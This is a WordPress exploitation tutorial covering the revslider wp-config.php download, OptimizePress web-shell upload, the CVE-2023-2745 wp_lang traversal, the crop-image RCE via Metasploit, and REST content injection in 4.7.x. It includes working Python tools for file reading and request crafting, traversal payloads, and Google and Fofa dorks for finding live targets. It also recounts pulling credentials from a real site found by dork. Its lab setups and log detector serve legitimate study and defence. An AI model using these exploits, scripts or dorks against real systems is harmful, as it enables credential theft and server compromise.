Find The Right Exploit
Vulnerable Plugins & Themes - Find the right exploit
Many WordPress compromises start with an outdated or misconfigured plugin or theme. Depending on the bug, exploiting one can give an attacker remote code execution (RCE), privilege escalation, or disclosure of sensitive files such as wp-config.php.
Step-by-Step Exploitation:
Enumerate Installed Plugins & Themes (Part II)
Check for Known Vulnerabilities
Cross-reference the discovered plugins/themes and their exact versions with CVE databases:
GitHub PoCs - Security researchers and penetration testers often share proof-of-concept (PoC) exploits on GitHub.
CVE Details / NVD (National Vulnerability Database)
Google "[plugin name] exploit", then confirm that the affected versions in the advisory match the version you enumerated; a PoC for the wrong version wastes time and generates noise in the target's logs.
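The cross-reference step above is a version comparison, and getting it wrong is the usual reason a PoC "does not work". The following is an added example for this page (not tooling from the original author): it pulls plugin/theme slugs and `?ver=` strings out of a constructed front-page HTML sample, then compares each version against a small table of known-vulnerable ranges. The two bounds in the table (revslider below 4.2, OptimizePress up to 1.45) are assumptions taken from the sections below and should be checked against the advisory before relying on them.

```python
"""Cross-reference enumerated plugin/theme versions against known-vulnerable ranges.

Added example for this page, not the original author's tooling. SAMPLE_HTML is a
constructed stand-in for a fetched front page; KNOWN_VULNERABLE holds assumed bounds.
"""
import re

# Constructed sample; a real target would be fetched with urllib and passed in as text.
SAMPLE_HTML = """
<meta name="generator" content="WordPress 4.7.1" />
<link rel='stylesheet' href='https://example.test/wp-content/plugins/revslider/rs-plugin/css/settings.css?ver=4.1.4' />
<link rel='stylesheet' href='https://example.test/wp-content/themes/OptimizePress/style.css?ver=1.45' />
<script src='https://example.test/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.7.7'></script>
"""

# (kind, slug) -> (operator, bound, note). Bounds are assumptions: verify against the advisory.
KNOWN_VULNERABLE = {
    ("plugins", "revslider"): ("<", "4.2", "arbitrary file download via revslider_show_image"),
    ("themes", "optimizepress"): ("<=", "1.45", "file upload in media-upload.php"),
}

ASSET_RE = re.compile(
    r"/wp-content/(plugins|themes)/([A-Za-z0-9_.-]+)/[^\s\"']*\?ver=([0-9][0-9A-Za-z.-]*)"
)
GENERATOR_RE = re.compile(r'<meta name="generator" content="WordPress ([0-9.]+)"')
OPS = {"<": lambda a, b: a < b, "<=": lambda a, b: a <= b}


def version_tuple(version, width=4):
    """Numeric components padded to a fixed width so '4.2' == '4.2.0' compares equal."""
    parts = [int(p) for p in re.findall(r"\d+", version)][:width]
    return tuple(parts + [0] * (width - len(parts)))


def enumerate_components(html):
    """Map (kind, slug) -> first version string seen in an asset URL."""
    found = {}
    for kind, slug, version in ASSET_RE.findall(html):
        found.setdefault((kind, slug.lower()), version)
    return found


def wordpress_version(html):
    match = GENERATOR_RE.search(html)
    return match.group(1) if match else None


def is_affected(found_version, op, bound):
    return OPS[op](version_tuple(found_version), version_tuple(bound))


def find_vulnerable(found):
    """Return (slug, version, note) for every enumerated component inside a known range."""
    hits = []
    for key, version in found.items():
        if key in KNOWN_VULNERABLE:
            op, bound, note = KNOWN_VULNERABLE[key]
            if is_affected(version, op, bound):
                hits.append((key[1], version, note))
    return hits


if __name__ == "__main__":
    components = enumerate_components(SAMPLE_HTML)
    print("WordPress", wordpress_version(SAMPLE_HTML))
    for slug, version, note in find_vulnerable(components):
        print(f"{slug} {version}: {note}")
```

One caveat when reading the output: the `?ver=` value on an enqueued asset is frequently the WordPress core version rather than the plugin's, so treat it as a hint and confirm the real version from the plugin's readme.txt ("Stable tag") or its main PHP file header before choosing an exploit.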
Revslider Plugin Exploit Example
A good example of a WordPress plugin exploit is the Slider Revolution (revslider) vulnerability discovered in 2014. It resulted in tens of thousands of compromised WordPress sites, and attempts to exploit it were still showing up in web server logs in 2019. One reason it was such an attractive target is that the plugin was bundled with many commercial themes, so site owners often did not know it was installed and never updated it.
A number of exploitation opportunities exist, but this one is the easiest to demonstrate: exploitation is no harder than loading this URL in a browser.
The request downloads the wp-config.php file from the vulnerable site if the exploitable version of revslider is installed. The bug is commonly labelled a local file include (LFI) because the attacker tricks the application code into including a sensitive file in the output; strictly speaking it is a path traversal leading to arbitrary file download, since the file contents are served to the attacker rather than executed. wp-config.php is not normally readable over HTTP and contains the database credentials for the WordPress database user.
With the database password, an attacker could try to log in as the WordPress admin using the same password (if passwords were reused). A more common attack vector is to log in to the phpMyAdmin script, if installed, because it authenticates with the database credentials. If MySQL is exposed to the network, it may even be possible to connect to the database directly with a MySQL client and the leaked credentials.
Access to the database lets the attacker reset the administrator password, attempt to crack the admin password hash, or modify content in the database, for example by adding malicious JavaScript or iframes to posts. There are many possibilities for further exploitation once the credentials in wp-config.php are leaked.
How to Install the Dummy Plugin
To demonstrate this behaviour, download the Dummy RevSlider Lab plugin from this repository (ZIP file).
Log in to your WordPress Admin Dashboard.
In the left sidebar, click Plugins → Add New.
At the top, click Upload Plugin.
Select the downloaded .zip file and upload it.
Once uploaded, click Activate Plugin.
The plugin is now active and ready for lab use.
Exploitation:
Great! Now everything is set. If we browse to this URL, the plugin triggers a download of the wp-config.php file, exposing the database username and password.
Please note: you can replace ../../../wp-config.php with any file path on the server. If the file does not exist, the downloaded file will be 0 bytes, so an empty download means a wrong path rather than a patched target.
For example, if your WordPress installation is located at /var/www/html/wordpress, any file within that directory can be accessed as ../../../[filename].
If you're unfamiliar with ../, it simply means "go up one directory level". With enough ../ sequences it is possible to traverse directories and read any file on the system that the web server user is allowed to read.
Google dork: revslider.php "index of"
Found a WordPress site with this plugin:
Browse to this URL:
The config file was downloaded, with username and password!
OptimizePress Theme Example Exploit
The OptimizePress theme exploit is a file upload vulnerability in media-upload.php:
Vulnerable versions: ≤ 1.45 (released 2013)
Vulnerability type: unauthenticated or insufficiently protected file upload
Impact: An attacker can upload a malicious PHP file (web shell) and execute arbitrary code on the server.
Why it works:
media-upload.php handles file uploads, but the theme does not validate the file type properly. Attackers can bypass the restrictions and upload .php scripts. Once uploaded, requesting the PHP file in a browser executes it on the server: full remote code execution (RCE).

Using Metasploit to find the exploit:
Open the Metasploit Framework (msfconsole)
Search for the WordPress theme module
Select the module
Set the target URL (and the target's WordPress path, if it is not the web root)
Select a payload
Run the exploit
Exploiting WordPress Core
Vulnerabilities in WordPress core crop up from time to time. Remote unauthenticated ones are relatively rare, but any attacker would do well to be familiar with the more exploitable vulnerabilities in WordPress Core.
CVE-2023-2745: Directory Traversal in WordPress Core ≤ 6.2
Published: May 17, 2023
CVSS v3.1 Base Score: 6.1 (Medium)
CWE Classification: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
Affected Versions: WordPress Core ≤ 6.2
Patched Version: WordPress 6.2.1
CVE-2023-2745 is a directory traversal vulnerability in WordPress Core that affects versions up to and including 6.2. The issue arises from improper sanitization of the wp_lang parameter accepted by wp-login.php, which selects the translation file to load. An unauthenticated attacker can exploit this flaw to make WordPress load an arbitrary translation file from the server, potentially leading to unauthorized information disclosure or further exploitation.
Technical Details
Vulnerable parameter: wp_lang
Exploit mechanism: directory traversal via the wp_lang parameter
Potential impact:
Unauthorized loading of arbitrary translation files
Potential information disclosure
In scenarios where an attacker can upload a crafted translation file (e.g. through an upload form), this vulnerability could be leveraged to perform cross-site scripting (XSS) attacks.
Note that a stock WordPress 6.2 uses the traversed path as a translation (.mo) file and does not echo it back; the dummy wp-login.php used in the lab below returns the file contents directly so that the traversal is easy to observe.
How to Install the Dummy wp-login.php vulnerability
To demonstrate this behaviour, download the Dummy wp-login.php from this repository.
Go to /var/www/html/wordpress/ (paste this in the terminal: cd /var/www/html/wordpress/).
Back up the original wp-login.php, remove it, and paste in the version from GitHub.
Refresh your WordPress server with this command:
The wp-login.php is now active and ready for lab use.
Lab Usage Options
Option 1: Manual testing via browser
Open your browser and go to:
Replace /etc/passwd with any file on the system.
Option 2: Automated testing with Python
Run the Python script from the cve-2023-2745 repo:
Please note: the first argument is the URL to wp-login.php, and the second is the file you want to read.
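The following is an added example for this page and is not the script from the cve-2023-2745 repo, though it takes the same two arguments (URL of wp-login.php, file to read). Beside the lab helper it includes an allow-list check of the kind the patched versions apply to the locale name, so you can see which inputs a fixed install rejects; the traversal depth and the URL are the caller's assumptions.

```python
"""Lab helper for the wp_lang traversal, plus the allow-list check a fixed install applies.

Added example for this page, not the referenced repo script.
Usage: python3 wp_lang_lab.py http://target/wp-login.php /etc/passwd
"""
import re
import sys
import urllib.parse
import urllib.request

# Locale names are letters, digits, '_' and '-' only; anything else (dots, slashes) is rejected.
LOCALE_RE = re.compile(r"[A-Za-z0-9_-]+")


def traversal_value(path, depth=6):
    """Value for wp_lang. The lab resolves it relative to the languages directory, so
    enough ../ sequences climb to the filesystem root; extra ones are harmless."""
    return "../" * depth + path.lstrip("/")


def build_url(login_url, path, depth=6):
    """Append wp_lang=<traversal> to the login URL, percent-encoding the slashes."""
    sep = "&" if "?" in login_url else "?"
    value = urllib.parse.quote(traversal_value(path, depth), safe="")
    return f"{login_url}{sep}wp_lang={value}"


def is_valid_locale(value):
    """What a patched determine_locale() accepts: a plain locale name, never a path."""
    return LOCALE_RE.fullmatch(value) is not None


def read_file(login_url, path, timeout=10):
    """Fetch the file through the lab's wp-login.php. None means an empty body, i.e.
    the file does not exist at that path or the target is not the lab version."""
    req = urllib.request.Request(build_url(login_url, path),
                                 headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read()
    return body.decode("utf-8", "replace") if body else None


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: wp_lang_lab.py <url-to-wp-login.php> <file>")
    content = read_file(sys.argv[1], sys.argv[2])
    print(content if content is not None else "no content returned (missing file or not vulnerable)")
```

Against a stock 6.2 install the same request does not return the file: the value is joined into a `.mo` path and handed to the translation loader, so the only useful payload there is a `.mo` file the attacker has already placed on disk, as noted in the technical details above.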
Finding Targets:
Fofa dork: icon_hash="1198047028" && body="WordPress 6.2"
You can lower the WordPress version in the dork, since every WordPress Core release ≤ 6.2 is affected.
CVE-2019-8942 & CVE-2019-8943: WordPress Core ≤ 4.9.8
WordPress has a built-in image editing feature (wp_crop_image() and the attachment file handling around it) that allows users to upload images and crop or scale them. This functionality touches both filesystem paths and PHP execution paths.
These vulnerabilities stem from:
CVE-2019-8942: the _wp_attached_file post meta of an attachment can be changed to an arbitrary string (for example one ending in .jpg?file.php), which lets an author get a crafted image containing PHP code in its Exif metadata included and executed.
CVE-2019-8943: path traversal in wp_crop_image(), which lets a user who can crop an image write the cropped output to an arbitrary directory via a filename containing ../ sequences.
When chained together:
the path traversal lets you trick WordPress into writing a file outside its intended uploads/ directory, and
the local file inclusion (LFI) lets the attacker load that file as executable PHP code.
The result: arbitrary PHP code execution.
Why it happened
WordPress's image crop code does not sanitize file paths correctly.
An author can edit an attachment's _wp_attached_file meta (for example through the REST API) to include ../../../../ sequences (directory traversal), so the cropped copy is saved in an unexpected location, such as the active theme's directory.
Later, because the _wp_page_template meta is not validated either, the attacker can point a post's template at that file so it is loaded via include() when the post is rendered.
This is dangerous because:
An attacker with the Author role or higher (anyone who can upload media) can upload a fake "image" (actually a PHP backdoor hidden in the image's Exif metadata).
Using traversal, they move a cropped copy of it into a location that WordPress will include as PHP.
Finally, they trigger the LFI to make WordPress execute the payload: full RCE.
Exploitation with Metasploit (wp_crop_rce)
Metasploit has a ready-made module (wp_crop_rce). Because the chain starts from media upload, the module needs a valid username and password for an account with at least the Author role:
Step 1. Module Setup
Step 2. Configure Payload
Step 3. Run Exploit
Unauthenticated Content Injection in WordPress 4.7.0 and 4.7.1
In this vulnerability from 2017 an unauthenticated attacker can inject content into an existing post through the wp-json REST API.
WordPress 4.7/4.7.1: remote unauthenticated content injection
How to Install the Dummy class-wp-rest-posts-controller.php vulnerability
To demonstrate this behaviour, download the Dummy class-wp-rest-posts-controller.php from this repository.
Go to /var/www/html/wordpress/wp-includes/rest-api/endpoints (paste this in the terminal: cd /var/www/html/wordpress/wp-includes/rest-api/endpoints).
Back up and remove the old version of /var/www/html/wordpress/wp-includes/rest-api/endpoints/class-wp-rest-posts-controller.php and paste in the version from GitHub.
Refresh your WordPress server with this command:
The class-wp-rest-posts-controller.php is now active and ready for lab use.
Lab Usage Options
Manual testing via curl
Open your terminal and send a POST request using curl:

Let's browse to our site and see the injection!
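Why does a request like `POST /wp-json/wp/v2/posts/1?id=1abc` bypass the permission check? The following is an added example for this page and is not WordPress code: two Python functions re-implement the control flow of the 4.7.1 and 4.7.2 versions of class-wp-rest-posts-controller.php as described in the public write-ups, with PHP's `is_numeric()` and `(int)` cast modelled explicitly, so the type-juggling failure can be seen offline. `POSTS` is a constructed in-memory stand-in for the posts table, and `build_request()` produces the lab request (the `?id=` query value overrides the numeric id from the route).

```python
"""Model of the WordPress 4.7.0/4.7.1 REST content-injection bug, plus a request builder.

Added example for this page, not WordPress code. POSTS is constructed; the two
update_item_* functions follow the 4.7.1 (vulnerable) and 4.7.2 (fixed) control flow.
"""
import json
import re
import urllib.request

POSTS = {1: {"title": "Hello world!", "content": "Welcome to WordPress."}}


def php_is_numeric(s):
    """PHP is_numeric(): '1' and '1.0' are numeric, '1abc' is not."""
    return re.fullmatch(r"\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?", s) is not None


def php_intval(s):
    """PHP (int) cast on a string: leading digits only, so (int)'1abc' == 1."""
    m = re.match(r"\s*([+-]?\d+)", s)
    return int(m.group(1)) if m else 0


def wp_get_post(post_id):
    """get_post(): WP_Post::get_instance() returns false for non-numeric or non-integer ids."""
    raw = str(post_id)
    if not php_is_numeric(raw):
        return None
    value = float(raw)
    if value != int(value) or int(value) <= 0:
        return None
    return POSTS.get(int(value))


def update_item_vulnerable(raw_id, new_content, user_can_edit):
    """4.7.1: the permission check looks the post up with the raw id. For '1abc' that
    finds nothing, so no permission error is raised; the update then casts with (int)."""
    post = wp_get_post(raw_id)
    if post and not user_can_edit:
        return "rest_cannot_edit"
    post = wp_get_post(php_intval(raw_id))
    if post is None:
        return "rest_post_invalid_id"
    post["content"] = new_content
    return "updated"


def update_item_fixed(raw_id, new_content, user_can_edit):
    """4.7.2: resolve the id once with (int), reject invalid ids, then check permission
    on the post that will actually be modified."""
    pid = php_intval(raw_id)
    post = wp_get_post(pid) if pid > 0 else None
    if post is None:
        return "rest_post_invalid_id"
    if not user_can_edit:
        return "rest_cannot_edit"
    post["content"] = new_content
    return "updated"


def build_request(base, post_id, content):
    """The lab request: the ?id= query value overrides the route's numeric id."""
    url = f"{base.rstrip('/')}/wp-json/wp/v2/posts/{post_id}?id={post_id}abc"
    body = json.dumps({"content": content}).encode()
    return urllib.request.Request(url, data=body, method="POST",
                                  headers={"Content-Type": "application/json"})


if __name__ == "__main__":
    print("vulnerable, anonymous, id=1abc:", update_item_vulnerable("1abc", "injected", False))
    print("fixed, anonymous, id=1abc:     ", update_item_fixed("1abc", "injected", False))
```

The lesson generalises beyond this CVE: whenever an authorization check and the action it guards resolve the same identifier by different routes (here a strict lookup versus a lossy cast), an input that is invalid for one and valid for the other slips through. Resolve once, then authorize and act on the resolved object.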

Fofa dork: icon_hash="1198047028" && body="WordPress 4.7"
Please note: it is highly unlikely that real WordPress sites are still running 4.7.0 or 4.7.1. Most of the "targets" you encounter online are honeypots, intentionally set up to monitor and log malicious activity. These honeypots are not real production sites; they exist to help security teams identify suspicious requests and improve defenses.
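The honeypot remark cuts both ways: every request on this page has a fixed, recognisable shape, which is exactly what a defender looks for. The following is an added example for this page (not from the original author): a small detector run over constructed Apache combined-log lines that flags the revslider traversal download, the wp_lang traversal and the REST id type-juggling request. The log lines are invented sample data; the matching rules encode only the request shapes described in the sections above.

```python
"""Flag exploitation attempts for the WordPress bugs on this page in an Apache access log.

Added example, not part of the original page. LOG_LINES is constructed sample data in
Apache combined format; the rules below encode the request shapes the text describes.
"""
import re
from urllib.parse import unquote

LOG_LINES = """\
203.0.113.5 - - [10/May/2024:12:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/May/2024:12:00:02 +0000] "GET /wp-login.php?wp_lang=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2101 "-" "python-requests/2.31"
198.51.100.7 - - [10/May/2024:12:00:03 +0000] "POST /wp-json/wp/v2/posts/1?id=1abc HTTP/1.1" 200 4551 "-" "curl/8.0"
192.0.2.9 - - [10/May/2024:12:00:04 +0000] "GET /wp-login.php?wp_lang=de_DE HTTP/1.1" 200 2101 "-" "Mozilla/5.0"
192.0.2.9 - - [10/May/2024:12:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=slide1.jpg HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
192.0.2.9 - - [10/May/2024:12:00:06 +0000] "POST /wp-json/wp/v2/posts/1 HTTP/1.1" 401 120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")
LOCALE_RE = re.compile(r"[A-Za-z0-9_-]*")


def query_params(query):
    """Decode twice so single- and double-encoded traversal both become visible."""
    decoded = unquote(unquote(query))
    return dict(p.split("=", 1) for p in decoded.split("&") if "=" in p)


def classify(method, target):
    """Return a label for a suspicious request, or None."""
    path, _, query = target.partition("?")
    params = query_params(query)
    if path.endswith("/wp-admin/admin-ajax.php") and params.get("action") == "revslider_show_image":
        if TRAVERSAL_RE.search(params.get("img", "")):
            return "revslider-file-download"
    if path.endswith("/wp-login.php") and "wp_lang" in params:
        if LOCALE_RE.fullmatch(params["wp_lang"]) is None:
            return "wp_lang-traversal"
    if method == "POST" and re.search(r"/wp-json/wp/v2/posts/\d+$", path):
        raw_id = params.get("id")
        if raw_id is not None and not raw_id.isdigit():
            return "rest-id-type-juggling"
    return None


def scan(log_text):
    """Return (ip, label, status) for every flagged line."""
    hits = []
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue
        label = classify(match["method"], match["target"])
        if label:
            hits.append((match["ip"], label, match["status"]))
    return hits


if __name__ == "__main__":
    for ip, label, status in scan(LOG_LINES):
        print(f"{ip:15} {label:26} status={status}")
```

The status code is kept in the output on purpose: a 200 with a sizeable body on the revslider request is a successful download, while a 0-byte 200 or a 404 is a probe that failed, and the two deserve different responses.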